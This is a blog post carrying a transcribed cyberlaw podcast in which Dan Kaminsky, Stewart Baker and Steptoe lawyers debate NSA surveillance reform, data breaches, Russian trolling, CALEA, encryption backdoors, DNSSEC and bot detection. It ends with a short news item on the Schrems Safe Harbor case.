So I went ahead and did a podcast with Stewart Baker, former general counsel for the NSA and actually somebody I have a decent amount of respect for (Google set me up with him during the SOPA debate, he understood everything I had to say, and he really applied some critical pressure publicly and behind the scenes to shut that mess down).  Doesn’t mean I agree with the guy on everything.  I told him in no uncertain terms we had some disagreements regarding backdoors. and if he asked me about them I’d say as such.  He was completely OK with this, and in today’s echo-chamber loving society that’s a real outlier.  The debate is a ways in, and starts around here.

You can get the audio (and a summary) here but as usual I’ve had the event transcribed.  Enjoy!


 

Steptoe Cyberlaw Podcast-070

Stewart: Welcome to episode 70 of the Steptoe Cyberlaw Podcast brought to you by Steptoe & Johnson; thank you for joining us. We’re lawyers talking about technology, security, privacy in government and I’m joined today by our guest commentator, Dan Kaminsky, who is the Chief Scientist at WhiteOps, the man who found and fixed a major and very troubling flaw in the DNS system and my unlikely ally in the fight against SOPA because of its impact on DNS security. Welcome, Dan.

Dan: It’s good to be here.

Stewart: All right; and Michael Vatis, formerly with the FBI and the Justice Department, now a partner in in Steptoe’s New York office. Michael, I’m glad to have you back, and I guess to be back with you on the podcast.

Michael: It’s good to have a voice that isn’t as hoarse as mine was last week.

Stewart: Yeah, that’s right, but you know, you can usually count on Michael to know the law – this is a valuable thing in a legal podcast – and Jason Weinstein who took over last week in a coup in the Cyberlaw podcast and ran it and interviewed our guest, Jason Brown from the Secret Service. Jason is formerly with the Justice Department where he oversaw criminal computer crime, prosecutions, among other things, and is now doing criminal and civil litigation at Steptoe.

I’m Stewart Baker, formerly with NSA and DHS, the record holder for returning to Steptoe to practice law more times than any other lawyer, so let’s get started. For old time’s sake we ought to do one more, one last hopefully, this week in NSA. The USA Freedom Bill was passed, was debated, not amended after efforts; passed, signed and is in effect, and the government is busy cleaning up the mess from the 48/72 hours of expiration of the original 215 and other sunsetted provisions.

So USA Freedom; now that it’s taken effect I guess it’s worth asking what does it do. It gets rid of bulk collection across the board really. It says, “No, you will not go get stuff just because you need it, and won’t be able to get it later if you can’t get it from the guy who holds it, you’re not going to get it.” It does that for a pen trap, it does that for Section 215, the subpoena program, and it most famously gets rid of the bulk collection program that NSA was running and that Snowden leaked in his first and apparently only successful effort to influence US policy.

[Helping] who are supposed to be basically Al Qaeda’s lawyers – that’s editorializing; just a bit – they’re supposed to stand for freedom and against actually gathering intelligence on Al Qaeda, so it’s pretty close. And we’ve never given the Mafia its own lawyers in wiretap cases before the wiretap is carried out, but we’re going to do that for –

Dan: To be fair you were [just] wiretapping the Mafia at the time.

Stewart: Oh, absolutely. Well, the NSA never really had much interest in the Mafia but with Title 3 yeah; you went in and you said, “I want a Title 3 order” and you got it if you met the standard, in the view of judge, and there were no additional lawyers appointed to argue against giving you access to the Mafia’s communications. And Michael, you looked at it as well – I’d say those were the two big changes – there are some transparency issues and other things – anything that strikes you as significant out of this?

Michael: I think the only other thing I would mention is the restrictions on NSLs where you now need to have specific selection terms for NSLs as well, not just for 215 orders.

Stewart: Yeah, really the house just went through and said, ”Tell us what capabilities could be used to gather international security agencies’ information and we will impose this specific selection term, requirement, on it.” That is really the main change probably for ordinary uses of 215 as though it were a criminal subpoena. Not that much change. I think the notion of relevance has probably always carried some notion that there is a point at which it gathered too much and the courts would have said, “That’s too much.”

Michael: going in that, okay, Telecoms already retain all this stuff for 18 months for billing purpose, and they’re required to by FCC regulation, but I think as we’ve discussed before, they’re not really required to retain all the stuff that NSA has been getting under bulk retention program, especially now that people have unlimited calling plans, Telecoms don’t need to retain information about every number call because it doesn’t matter for billing purposes.

So I think, going forward, we’ll probably hear from NSA that they’re not getting all the information they need, so I don’t think this issue is going to go away forever now. I think we’ll be hearing complaints and having some desire by the Administration to impose some sort of data retention requirements on Telecoms, and then they’ll be a real fight.

Stewart: That will be a fight. Yeah, I have said recently that, sure, this new approach can be as effective as the old approach if you think that going to the library is an adequate substitute for using Google. They won’t be able to do a lot of the searching that they could do and they won’t have as much data. But on the upside there are widespread rumors that the database never included many smaller carriers, never included mobile data probably because of difficulties separating out location data from the things that they wanted to look at.

So privacy concerns have already sort of half crippled the program and it also seems to me you have to be a remarkably stupid terrorist to think that it’s a good idea to call home using a phone that operates in the United States. People will use call of duty or something to communicate.

All right, the New York Times has one of its dumber efforts to create a scandal where there is none – it was written by Charlie Savage and criticized “Lawfare” by Ben Wittes and Charlie, who probably values his reputation in National Security circles somewhat, writes a really slashing response to Ben Wittes, but I think, frankly, Ben has the better of the argument.

The story says “Without public notice or debate the Obama Administration has expanded NSAs warrant with surveillance of American’s international internet traffic to search for evidence of malicious computer hacking” according to some documents obtained from Snowden. It turns out, if I understand this right, that what NSA was looking for in that surveillance, which is a 702 surveillance, was malware signatures and other indicia that somebody was hacking Americans, so they collected or proposed to collect the incoming communications from the hackers, and then to see what was exfiltrated by the hackers.

In what universe would you describe that as American’s international internet traffic? I don’t think when somebody’s hacking me or stealing my stuff, that that’s my traffic. That’s his traffic, and to lead off with that framing of the issue it’s clearly baiting somebody for an attempted scandal, but a complete misrepresentation of what was being done.

Dan: I think one of the issues is there’s a real feeling, “What are you going to do with that data?” Are you going to report it? Are you going to stop malware? Are you going to hunt someone down?

Stewart: All of it.

Dan: Where is the – really?

Stewart: Yeah.

Dan: Because there’s a lot of doubt.

Stewart: Yeah; I actually think that the FBI regularly – this was a program really to support the FBI in its mission – and the FBI has a program that’s remarkably successful in the sense that people are quite surprised when they show up, to go to folks who have been compromised to say, “By the way, you’re poned,” and most of the time when they do that some people say, “What? Huh?” This is where some of that information almost certainly comes from.

Dan: The reality is, everyone always says, “I can’t believe Sony got hacked,” and many of us actually in the field go, “Of course we can believe it.” Sony got hacked because everybody’s hacked somewhere.

Stewart: Yes, absolutely.

Dan: There’s a real need to do something about this on a larger scale. There is just such a lack of trust going on out there.

Stewart: Oh yeah.

Dan: And it’s not without reason.

Stewart: Yeah; Jason, any thoughts about the FBIs role in this?

Jason: Yeah. I think that, as you said, the FBI does a very effective job at knocking on doors or either pushing out information generally through alerts about new malware signatures or knocking on doors to tell particular victims they’ve been hacked. They don’t have to tell them how they know or what the source of the information is, but the information is still valuable.

I thought to the extent that this is one of those things under 702, where I think a reasonable person will look at this and be appreciative of the fact that the government was doing this, not critical. And as you said, the notion that this is sort of stolen internet traffic from Americans is characterized as surveillance of American’s traffic, is a little bit nonsensical.

Stewart: So without beating up Charlie Savage – I like him, he deserves it on this one – but he’s actually usually reasonably careful. The MasterCard settlement or the failed MasterCard settlement in the Target case, Jason, can you bring us up to date on that and tell us what lessons we should learn from it?

Jason: There have been so many high profile breaches in the last 18 months people may not remember Target, which of course was breached in the holiday season of 2013. MasterCard, as credit card companies often do, try to negotiate a settlement on behalf of all of their issuing banks with Target to pay damages for losses suffered as a result of the breach. In April MasterCard negotiated a proposed settlement with Target that would require Target to pay about $19 million to the various financial institutions that had to replace cards and cover for all losses and things of that nature.

But three of the largest banks, in fact I think the three largest MasterCard issuing banks, Citi Group, Capital One and JP Morgan Chase, all said no, and indicated they would not support the settlement and scuttled it because they thought $19 million was too small to cover the losses. There are trade groups for the banks and credit unions that say that between the Target and Home Depot breaches combined there were about $350 million in costs incurred by the financial institutions to reissue cards and cover losses, and so even if you factor out the Home Depot portion of that $19 million, it’s a pretty small number.

So Target has to go back to the drawing board, as does MasterCard to figure out if there’s a settlement or if the litigation is going to continue. And there’s also a proposed class action ongoing in Minnesota involving some smaller banks and credit unions as well. It would only cost them $10 million to settle the consumer class action, but the bigger exposure is here with the financial institution – Michael made reference last week to some press in which some commentator suggested the class actions from data breaches were on the wane – and we both are of the view that that’s just wrong.

There may be some decrease in privacy related class actions related to misuse of private information by providers, but when it comes to data breaches involving retailers and credit card information, I think not only are the consumer class actions not going anywhere, but the class actions involving the financial institutions are definitely not going anywhere. Standing is not an issue at all. It’s pretty easy for these planners to demonstrate that they suffered some kind of injury; they’re the ones covering the losses and reissuing the cards, and depending on the size of the breach the damages can be quite extensive. I think it’s a sign of the times that in these big breaches you’ll find banks that are insisting on a much bigger pound of flesh from the victims.

Stewart: Yeah, I think you’re right about that. The settlements, as I saw when I did a quick study of settlements for consumers, are running between 50 cents and two bucks per exposure, which is not a lot, and the banks’ expenses for reissuing cards are more like 50 bucks per victim. But it’s also true that many of these cards are never going to be used; many of these numbers are never going to be used, and so spending 50 bucks for every one of them to reissue the cards, at considerable cost to the consumers as well, might be an overreaction, and I wouldn’t be surprised if that were an argument.

Dan: So my way of looking at this is from the perspective of deterrence. Is $19 million enough of a cost to Target to cause them to change their behavior and really divest – it’s going to extraordinarily expense to migrate our payment system to the reality, which is we have online verification. We can use better technologies. They exist. There’s a dozen ways of doing it that don’t lead to a password to your money all over the world. This is ridiculous.

Stewart: It is.

Dan: I’m just going to say the big banks have a point; $19 million is –

Stewart: Doesn’t seem like a lot.

Dan: to say, “We really need to invest in this; this never needs to happen again,” and I’m not saying 350 is the right number but I’ve got to agree, 19 is not.

Stewart: All right then. Okay, speaking of everybody being hacked, everybody includes the Office of Personnel Management.

Dan: Yeah.

Stewart: My first background investigation and it was quite amusing because the government, in order to protect privacy, blacked out the names of all the investigators who I wouldn’t have known from Adam, but left in all my friends’ names as they’re talking about my drug use, or not.

Dan: Alleged.

Stewart: Exactly; no, they were all stand up guys for me, but there is a lot of stuff in there that could be used for improper purposes and it’s perfectly clear that if the Chinese stole this, stole the Anthem records, the health records, they are living the civil libertarian’s nightmare about what NSA is doing. They’re actually building a database about every American in the country.

Dan: Yeah, a little awkward, isn’t it?

Stewart: Well, annoying at least; yes. Jason, I don’t know if you’ve got any thoughts about how OPN responds to this? They apparently didn’t exactly cover themselves with glory in responding to an IG report from last year saying, “Your system sucks so bad you ought to turn them off.”

Jason: Well, first of all as your lawyer I should say that your alleged drug use was outside the limitations period of any federal or state government that I’m aware of, so no one should come after you. I thought it was interesting that they were offering credit monitoring, given that the hack has been attributed to China, which I don’t think is having any money issues and is going to steal my credit card information.

I’m pretty sure that the victims include the three of us so I’m looking forward to getting that free 18 months of credit monitoring. I guess they’ve held out the possibility that the theft was for profit as opposed to for espionage purposes, and the possibility that the Chinese actors are not state sponsored actors, but that seems kind of nonsensical to me. And I think that, as you said, as you both said, that the Chinese are building the very database on us that Americans fear that the United States was building.

Stewart: Yeah, and I agree with you that credit monitoring is a sort of lame and bureaucratic response to this. Instead, they really ought to have the FBI and the counterintelligence experts ask, “What would I do with this data if I were the Chinese?” and then ask people whose data has been exploited to look for that kind of behavior. Knowing how the Chinese do their recruiting I’m guessing they’re looking for people who have family still in China – grandmothers, mothers and the like, and who also work for the US government – and they will recruit them on the basis of ethnic and patriotic duty. And so folks who are in that situation could have their relatives visited for a little chat; there’s a lot of stuff that is unique to Chinese use of this data that we ought to be watching for a little more aggressively than stealing our credit.

Stewart: Yeah; well, that’s all we’ve got when it’s hackers. We should think of a new response to this.

Dan: We should, but like all hacks [attribution] is a pain in the butt because here’s the secret – hacking is not hard; teenagers can do it.

Stewart: Yes, that’s true.

Dan: [Something like this can take just] a few months.

Stewart: But why would they invest?

Dan: Why not? Data has value; they’ll sell it.

Stewart: Maybe; so that’s right. On the other hand the Anthem data never showed up in the markets. We have better intelligence than we used to. We’ll know if this stuff gets sold and it hasn’t been sold because – I don’t want to give the Chinese ideas but –

Dan: I don’t think they need you to give them ideas; sorry.

Stewart: One more story just to show that I was well ahead of the Chinese on this – my first security clearance they asked me for people with whom I had obligations of affection or loyalty, who were foreigners. And I said I’m an international lawyer – this was before you could just print out your Outlook contacts – I Xeroxed all those sheets of business cards that I’d collected, and I sent it to the guys and said, “These are all the clients or people I’ve pitched,” and he said, “There are like 1,000 names here.” I said, “Yeah, these are people that I either work for or want to work for.” And he said, “But I just want people to whom you have ties of obligation or loyalty or affection.” I said, “Well, they’re all clients and I like them and I have obligations to clients or I want them to be. I’ve pitched them.” And he finally stopped me and said, “No, no, I mean are you sleeping with any of them?” So good luck China, figuring out which of them, if any, I was actually sleeping with.

Dan: You see, you gave up all those names to China.

Stewart: They’re all given up.

Dan: Look what you did!

Stewart: Exactly; exactly. Okay, last a topic – Putin’s trolls – I thought this was fascinating. This is where the New York Times really distinguished itself with this article because it told us something we didn’t know and it shed light on kind of something astonishing. This is the internet association I think. Their army of trolls, and the Chinese have an even larger army of trolls, and essentially Putin’s FSB has figured out that if you don’t want to have a Facebook revolution or a Twitter revolution you need to have people on Twitter, on Facebook 24 hours a day, posting comments and turning what would otherwise be evidence of dissent into a toxic waste dump with people trashing each other, going off in weird directions, saying stupid things to the point where no one wants to read the comments anymore.

It’s now a policy. They’ve got a whole bunch of people doing it, and on top of it they’ve decided, “Hell, if the US is going to export Twitter and Twitter revolutions then we’ll export trolling,” and to the point where they’ve started making up chemical spills and tweeting them with realistic video and people weighing in to say, “Oh yeah, I can see it from my house, look at those flames.” All completely made up and doing it as though it were happening in Louisiana.

Dan: The reality is that for a long time the culture has managed. We had broadcasts, broadcasters had direct government links, everything was filtered, and the big experiment of the internet was what if we just remove those filters? What if we just let the people manage it themselves? And eventually astroturfing did not start with Russia; there’s been astroturfing for years. It’s where you have these people making fake events and controlling the message. What is changing is the scale of it. What is changing is who is doing it. What is changing is the organization and the amount of investment. You have people who are professionally operating to reduce the credibility of Twitter, of Facebook so that, quote/unquote, the only thing you can trust is the broadcast.

Stewart: I think that’s exactly right. I think they call the Chinese version of this the 50 Cent Army because they get 50 cents a post. But I guess I am surprised that the Russians would do that to us in what is plainly an effort to test to see whether they could totally disrupt our emergency response, and it didn’t do much in Louisiana but it wouldn’t be hard in a more serious crisis, for them to create panic, doubt and certainly uncertainty about the reliability of a whole bunch of media in the United States.

This was clearly a dry run and our response to it was pretty much that. I would have thought that the US government would say, “No, you don’t create fake emergencies inside the United States by pretending to be US news media.”

Jason: I was going to say all those alien sightings in Roswell in the last 50 years do you think were Russia or China?

Stewart: Well, they were pre Twitter; I’m guessing not but from now on I think we can assume they are.

Dan: What it all comes back to is the crisis of legitimacy. People do not trust the institutions that are around them. If you look there’s too much manipulation, too much skin, too many lives, and as it happens institutions are not all bad. Like you know what? Vaccines are awesome but because we have this lack of legitimacy people are looking to find what is the thing I’m supposed to be paying attention to, because the normal stuff keeps coming out that it was a lie and really, you know what, what Russia’s doing here is just saying, “We’re going to find the things that you’re going to instead, that you think are lying; we’re going to lie there too because what we really want is we want America to stop airing our dirty laundry through this Twitter thing, and if America is not going to regulate Twitter we’re just going to go ahead and make a mess of it too.”

Stewart: Yeah. I think their view is, “Well, Twitter undermines our legitimacy; we can use it to undermine yours?”

Dan: Yeah, Russians screwing with Americans; more likely than you think.

Michael: I’m surprised you guys see it as an effort to undermine Twitter; this strikes me as classic KGB disinformation tactics, and it seems to me they’re using a new medium and, as you said before, they’re doing dry runs so that when they actually have a need to engage in information operations against the US or against Ukraine or against some other country, they’ll know how to do it. They’ll have practiced cores of troll who know how to do this stuff in today’s media. I don’t think they’re trying to undermine Twitter.

Stewart: One of the things that interesting is that the authoritarians have figured out how to manage their people using electronic tools. They were scared to death by all of this stuff ten years ago and they’ve responded very creatively, very effectively to the point where I think they can maintain an authoritarian regime for a long time, without totalitarianism but still very effectively. And now they’re in the process of saying, “Well, how can we use these tools as a weapon the way they perceive the US has used the tools as weapon in the first ten years of social media.” We need a response because they’re not going to stop doing it until we have a response.

Michael: I’d start with the violation of the missile treaty before worrying about this so much.

Stewart: Okay, so maybe this is of a piece with the Administration’s strategy for negotiating with Russia, which is to hope that the Russians will come around. The Supreme Court had a ruling in the case we talked about a while ago; this is the guy who wrote really vile and threatening and scary things about his ex wife and the FBI agent who came to interview him and who said afterwards, after he’d posted on Facebook and was arrested for it, “Well, come on, I was just doing what everybody in hip hop does; you shouldn’t take it seriously. I didn’t,” and the Supreme Court was asked to decide whether the test for threatening action is the understanding of the writer or the understanding of the reader? At least that’s how I read it, and they sided with the writer, with the guy who wrote all those vile things. Michael, did you look more closely at that than I did?

Michael: The court read into it a requirement that the government has to show at least that the defendant sent the communication with the purpose of issuing a threat or with the knowledge that it would be viewed as a threat, and it wasn’t enough for the government to argue and a jury to find that a reasonable person would perceive it as a threat.

So you have to show at least knowledge or purpose or intent, and it left open the question whether recklessness as to how it would be perceived, was enough.

Stewart: All right; well, I’m not sure I’m completely persuaded but it probably also doesn’t have enough to do with CyberLaw in the end to pursue. Let’s close up with one last topic, which is the FBI is asking for or talking about expanding CALEA to cover social media, to cover communications that go out through direct messaging and the like, saying it’s not that we haven’t gotten cooperation from social media when we wanted it or a wiretap; it’s just that in many cases they haven’t been able to do it quickly enough and we need to set some rules in advance for their ability to do wiretaps.

This is different from the claim that they’re Going Dark and that they need access to encrypted communications; it really is an effort to actually change CALEA, which is the Communications Assistance Law Enforcement Act from 1994, and impose that obligation on cellphone companies and then later on voiceover IP providers. Jason, what are the prospects for this? How serious a push is this?


Jason: Well, prospects are – it’s DOA – but just to put it in a little bit of historical perspective. So Going Dark has of late been the name for the FBIs effort to deal with encryption, but the original use of that term, Going Dark was, at least in 2008/2009 when the FBI started a legislative push to amend CALEA and extend it to internet based communications, Going Dark was the term they used for that effort. They would cite routinely the fact that there was a very significant number of wiretaps in both criminal and national security case that providers that were not covered by CALEA didn’t have the technical capability to implement.

So it wasn’t about law enforcement having the authority to conduct a wiretap; they by definition has already definition had already developed enough evidence to satisfy a court that they could meet the legal standard. It was about the provider’s ability to help them execute that authority that they already had. As you suggested, either the wiretap couldn’t be done at all or the provider and the government would have to work together to develop a technical solution which could take months and months, by which time the target wasn’t using that method of communication anymore; had moved onto something else.

So for the better part of four years, my last four years at the department, the FBI was pushing along with DEA and some other agencies, for a massive CALEA reform effort to expand it to internet based communications. At that time – this is pre Snowden; it’s certainly truer now – but at that time it was viewed as a political non starter, to try to convince providers that CALEA should be expanded.

So they downshifted as a Plan B to try to amend Title 18, and I think there were some parallel amendments to Title 50, but the Title 18 amendments would have dramatically increased the penalties for provider who didn’t have the capability to implement a wiretap order, a valid wiretap order that law enforcement served.

There would be this graduating series of penalties that would essentially create a significant financial disincentive for a provider not to have in their sight capability in advance or to be able to develop one quite quickly. So the FBI, although it wanted CALEA to be expanded was willing to settle for this sort of indirect way to achieve the same thing; to incentivize providers to develop an intercept solutions.

That was an unlikely Bill to make it to the Hill and to make it through the Hill before Snowden; after Snowden I think it became politically plutonium. It was very hard even before Snowden to explain to people that this was not an effort to expand authorities; it was about executing those authorities. That argument became almost impossible to make in the post Snowden world.

What struck me about this story though is that they appear to be going back to Plan A, which is trying to go in the front door and expand CALEA, and the only thing I can interpret is either that the people running this effort now are unaware of the previous history that they went through, or they’ve just decided what the hell; they have nothing to lose. They’re unlikely to get it through anyway so they might as well ask for what they want.

Stewart: That’s my impression. There isn’t any likelihood in the next two years that encryption is going to get regulated, but the Justice Department and the FBI are raising this issue I think partly on what the hell, this is what we want, this is what we need, we might as well say so, and partly I think preparation of the battle space for the time when they actually have a really serious crime that everybody wishes had been solved and can’t be solved because of some of these technical gaps.

Dan: You know what drives me nuts is we’re getting hacked left and right; we’re leaking data left and right, and all these guys can talk about is how they want to leak more data. Like when we finish here this is about encryption. We’re not saying we’re banning encryption but if there’s encryption and we can’t get through it we’re going to have a graduated series of costs or we’re going to pull CALEA into this. There’s entire classes of software we need to protect American business that are very difficult to invest in right now. It’s very difficult to know, in the long term, that you’re going to get to run it.

Stewart: Well, actually my impression is that VCs are falling all over themselves to fund people who say, “Yeah, we’re going to stick it to the NSA.”

Dan: Yeah, but those of us who actually know what we’re doing, know whatever we’re doing, whatever would actually work, is actually under threat. There are lots of scammers out there; oh my goodness, there are some great, amazing, 1990s era snake oil going on, but the smart money is not too sure we’re going to get away with securing anything.

Stewart: I think that’s probably right; why don’t we just move right in because I had promised I was going to talk about this from the news roundup to this question – Julian Sanchez raised it; I raised it with Julian at a previous podcast. We were talking about the effort to get access to encrypted communications and I mocked the people who said, “Oh, you can never provide access without that; that’s always a bad idea.” And I said, “No, come on.” Yes, it creates a security risk and you have to manage it but sometimes the security risk and the cost of managing it is worth it because of the social values.

Dan: Sometimes you lose 30 years of background check data.

Stewart: Yeah, although I’m not sure they would have. I’m not sure how encryption, especially encryption of data in motion, would have changed that.

Dan: It’s a question of can you protect the big magic key that gives you access to everything on the Internet, and the answer is no.

Stewart: So let me point to the topic that Julian didn’t want to get into because it seemed to be more technical than he was comfortable with which is –

Dan: Bring it on.

Stewart: Exactly. I said, “Are you kidding me? End to end encryption?” The only end to end encryption that has been adopted universally on the internet since encryption became widely exportable is SSL/TLS. That’s everywhere; it’s default.

Okay, but SSL/TLS is broken every single day by the thousands, if not the millions, and it’s broken by respectable companies. In fact, probably every Fortune 500 company insists that SSL has to be broken at their firewall.

And they do it; they do it so that they can inspect the traffic to see whether some hacker is exfiltrating the –

Dan: Yeah, but they’re inspecting their own traffic. Organizations can go ahead and balance their benefits and balance their risks. When it’s an external actor it’s someone else’s risk. It’s all about externality.

Stewart: Well, yes, okay; I grant you that. The point is the idea that building in access is always a stupid idea, never worth it. It’s just wrong, or at least it’s inconsistent with the security practices that we have today. And probably, if anything, some of the things that companies like Google and Facebook are doing to promote SSL are going to result in more exfiltration of data. People are already exfiltrating data through Google properties because Google insists that they be whitelisted from these intercepts.

Dan: What’s increasingly happening is that corporations are moving the intercept and DLP and analytics role to the endpoint because operating it as a midpoint just gets slower and more fragile day after day, month after month, year after year. If you want security, look, it’s your property, you’re a large company, you own 30,000 desktops, they’re your desktops, and you can put stuff on them.

Stewart: But the problem that the companies have, which is weighing the importance of end to end encryption for security versus the importance of being able to monitor activity for security, they have come down and said, “We have to be able to monitor it; we can’t just assume that every one of our users is operating safely.” That’s a judgment that society can make just as easily. Once you’ve had the debate society can say, “You know, on the whole, ensuring the privacy of everybody in our country versus the risks of criminals misusing that data, we’re prepared to say we can take some risk on the security side to have less effective end to end encryption in order to make sure that people cannot get away with breaking the law with impunity.”

Dan: Here’s a thing though – society has straight out said, “We don’t want bulk surveillance.” If you want to go ahead and monitor individuals, you have a reason to monitor, that’s one thing but –

Stewart: But you can’t monitor all of them. If they’ve been given end to end – I agree with you – there’s a debate; I’m happy to continue debating it but I’ve lost so far. But you say, no, it’s this guy; this guy, we want to listen to his communications, we want to see what he is saying on that encrypted tunnel, you can’t break that just stepping into the middle of it unless you already own his machine.

Dan: Yeah, and it’s unfortunately the expensive road.

Stewart: because they don’t do no good.

Dan: isn’t there. It isn’t the actual thing.

Stewart: It isn’t here – I’m over at Stanford and we’re at the epicenter of a contempt for government, but everybody gets a vote. You get a vote if you live in Akron, Ohio too, but nobody in Akron gets a vote about where their end to end encryption is going to be deployed.

Dan: You know, look, average people, normal people have like eight secure messengers on their phone. Text messaging has fallen off a cliff; why? At the end of the day it’s because people want to be able to talk to each other and not have everyone spying on them. There’s a cost, there’s an actual cost to spying on the wrong people.

Stewart: There is?

Dan: If you go ahead and you make everyone your enemy you find yourself with very few friends. That’s how the world actually works.

Stewart: All right; I think we’ve at least agreed that there’s routine breakage of the one end to end encryption methodology that has been widely deployed. I agree with you, people are moving away from man in middle and are looking to find ways to break into systems at the endpoint or close to the endpoint. Okay; let’s talk a little bit, if we can, about DNSSEC because we had a great fight over SOPA and DNSSEC, and I guess the question for me is what – well, maybe you can give us two seconds or two minutes on what DNSSEC is and how it’s doing in terms of deployment.

Dan: DNSSEC, at the end of the day makes it as easy to get encryption keys as it is to get the address for a server. Crypto should not be drama. You’re a developer, you need to figure out how to encrypt something, hit the encrypt button, you move on with your life. You write your app. That’s how it needs to work.

DNS has been a fantastic success at providing addressing to the internet. It would be nice if keying was just as easy, but let me tell you, how do you go ahead and go out and talk to all these internet people about how great DNSSEC is when really it’s very clear DNS itself – it’s not like SOPA fights, it’s not going to come back –

Stewart: Yeah; well, maybe.

Dan: – and it’s not like the security establishment, which should be trying to make America safer, it’s like, “Man, we really want to make sure we get our keys in there.” When that happens [it doesn’t work]. It’s not that DNSSEC isn’t a great technology, but it really depends on politically [the DNS and its contents] being sacrosanct.

Stewart: Obviously, DHS, the OMB committed to getting DNSSEC deployed at the federal level, and so their enthusiasm for DNSSEC has been substantial. Are you saying that they have undermined that in some way that –

Dan: The federal government is not monolithic; two million employees, maybe more, and what I’m telling you is that besides the security establishment that’s keeping on saying, “Hey, we’ve got to be able to get our keys in there too,” has really – we’ve got this dual mission problem going on here. Any system with a dual mission, no one actually believes there’s a dual mission, okay.

If the Department of Transportation was like, “Maybe cars should cars should crash from time to time,” if Health or Human Services was like, “Hey, you know, polio is kind of cool for killing some bad guys.” No one would take those vaccines because maybe it’s the other mission and that’s kind of the situation that we have right here. Yeah, DNSSEC is a fantastic technology for key distribution, but we have no idea five years from now what you’re going to do with it, and so instead it’s being replaced with garbage [EDIT: This is rude, and inappropriate verbiage.]

I’m sorry, I know people are doing some very good work, but let me tell you, their value add is it’s a bunch of centralized systems that all say, “But we’re going to stand up to the government.” I mean, that’s the value add and it never scales, it never works but we keep trying because we’ve got to do something because it’s a disaster out there. And honestly, anything is better than what we’ve got, but what we should be doing is DNSSEC and as long as you keep making this noise we can’t do it.

Stewart: So DNSSEC is up to what? Ten percent deployment?

Dan: DNSSEC needs a round of investment that makes it a turnkey switch.

Stewart: Aah!

Dan: DNSSEC could be done [automatically] but every server just doesn’t. We [could] just transition the internet to it. You could do that. The technology is there but the politics are completely broken.

Stewart: Okay; last set of questions. You’re the Chief Scientist at WhiteOps and let me tell you what I think WhiteOps does and then you can tell me what it really does. I think of WhiteOps as having made the observation that the hackers who are getting into our systems are doing it from a distance. They’re sending bots into pack up and exfiltrate data. They’re logging on and bots look different from human beings when they type stuff and the people who are trying to manage an intrusion remotely also looks different from somebody who is actually on the network and what WhiteOps is doing is saying, “We can find those guys and stop them.”

Dan: And it’s exactly what we’re doing. Look, I don’t care how clever your buffer overflow is; you’re not teleporting in front of a keyboard, okay. That’s not going to happen. So our observation is that we have this very strong signal, it’s not perfect because sometimes people VPN in, sometimes people make scripted processes.

Stewart: But they can’t keep a VPN up for very long?

Dan: [If somebody is remotely] on the machine; you can pick it up in JavaScript. So you have a website that’s being lilypad accessed either through bulk communications with command and control to a bot, or through interaction with remote control, churns out weak signals that we’re able to pick up in JavaScript.

Stewart: So this sounds so sensible and so obvious that I guess my question is how come we took this long to have that observation become a company?

Dan: I don’t know but we built it. The reality is, is that it requires knowledge of a lot of really interesting browser internals. At WhiteOps we’ve been breaking browsers for years so we’re basically taking all these bugs that actually never let you attack the user but they have completely different responses inside of a bot environment. That’s kind of the secret sauce.

Every browser is really a core object that reads HTML 5, Java Scripted video, all the things you’ve got to do to be a web browser. Then there’s like this goop, right? Like it puts it on the screen, it has a back button, uses an address bar, and lets you configure stuff, so it turns out that the bots use the core not the goop.

Stewart: Oh yeah, because the core enables them to write one script for everything?

Dan: Yeah, so you have to think of bots as really terribly tested browsers and once you realize that it’s like, “Oh, this is barely tested, let’s make it break.”

Stewart: Huh! I know you’ve been doing work with companies looking for intrusions. You’ve also been working with advertisers; not trying to find people who are basically engaged in click fraud. Any stories you can tell about catching people on well guarded networks?

Dan: I think one story I really enjoy – we actually ran the largest study into ad fraud that had ever been done, of its nature. We found that there’s going to be about $6 billion of ad fraud at http://whiteops.com/botfraud, and we had this one case, so we tell the world we’re going to go ahead and run this test in August and find all the fraud. You know what? We lied. We do that sometimes.

We actually ran a test from a little bit in July, all the way through September and we watched this one campaign; 40 percent fraud, then when we said we were going to start, three percent fraud. Then when we said we’re going to start, back to 40. You just had this square wave. It was the most beautiful demo. We showed this to the customers – one of the biggest brands in the country – and they were just like, “Those guys did what?”

And here’s what’s great – for my entire career I’ve been dealing with how people break in. This bug, that bug, what’s wrong with Flash, what’s wrong with Java? This is the first time in my life I have ever been dealing with why. People are doing this fraud to make money. Let’s stop the checks from being written? It’s been incredibly entertaining.

Stewart: Oh, that it is; that’s very cool, and it is – I guess maybe this is the observation. We wasted so much time trying to keep people out of systems hopelessly; now everybody says, “Oh, you have to assume they’re in,” but that doesn’t mean you have the tools to really deal with them, and this is a tool to deal with people when they’re in.

Dan: There’s been a major shift from prevention to detection. We basically say, “Look, okay, they’re going to get in but they don’t necessarily know what perfectly to do once they’re in.” Their actions are fundamentally different than your legitimate users and they’re always going to be because they’re trying to do different things; so if you can detect properties of the different things that they’re doing you actually have signals, and it always comes down to signals in intelligence.

Stewart: Yeah; that’s right. I’m looking forward to NSA deploying WhiteOps technology, but I won’t ask you to respond to that one. Okay, Dan, this was terrific I have to say. I’d rather be on your side of an argument than against you, but it’s been a real pleasure arguing this out. Thanks for coming in Michael, Jason; I appreciate it.

Just to close up the CyberLaw Podcast is open to feedback. Send comments to cyberlawpodcast@steptoe.com; leave a message at 202 862 5785. I’m still waiting for an entertainingly abusive voicemail. We haven’t got them. This has been episode 70 of the Steptoe CyberLaw Podcast brought to by Steptoe & Johnson. Next week we’re going to be joined by Catherine Lotrionte, who is the Associate Director of the Institute for Law, Science and Global Security at Georgetown. And coming soon we’re going to have Jim Baker, the General Counsel of the FBI; Rob Knake, a Senior Fellow for Cyber Policy at the Council on Foreign Relations. We hope you’ll join us next week as we once again provide insights into the latest events in technology, security, privacy in government.

Europe’s Highest Court Delays Decision in Safe Harbor Case Schrems vs. Facebook

On June 9, 2015, Max Schrems tweeted that the Advocate General of the European Court of Justice (“ECJ”) will delay his opinion in Europe v. Facebook, a case challenging the U.S.-EU Safe Harbor Framework. The opinion was previously scheduled to be issued on June 24. No new date has been set.

The delay may allow the U.S. and EU to conclude their negotiations regarding updating the Safe Harbor Framework before the ECJ issues an opinion that could impact the Framework. According to reports, although certain issues concerning the national security exemptions to the U.S.-EU Safe Harbor Framework still need to be resolved, the negotiations are expected to be concluded within weeks.

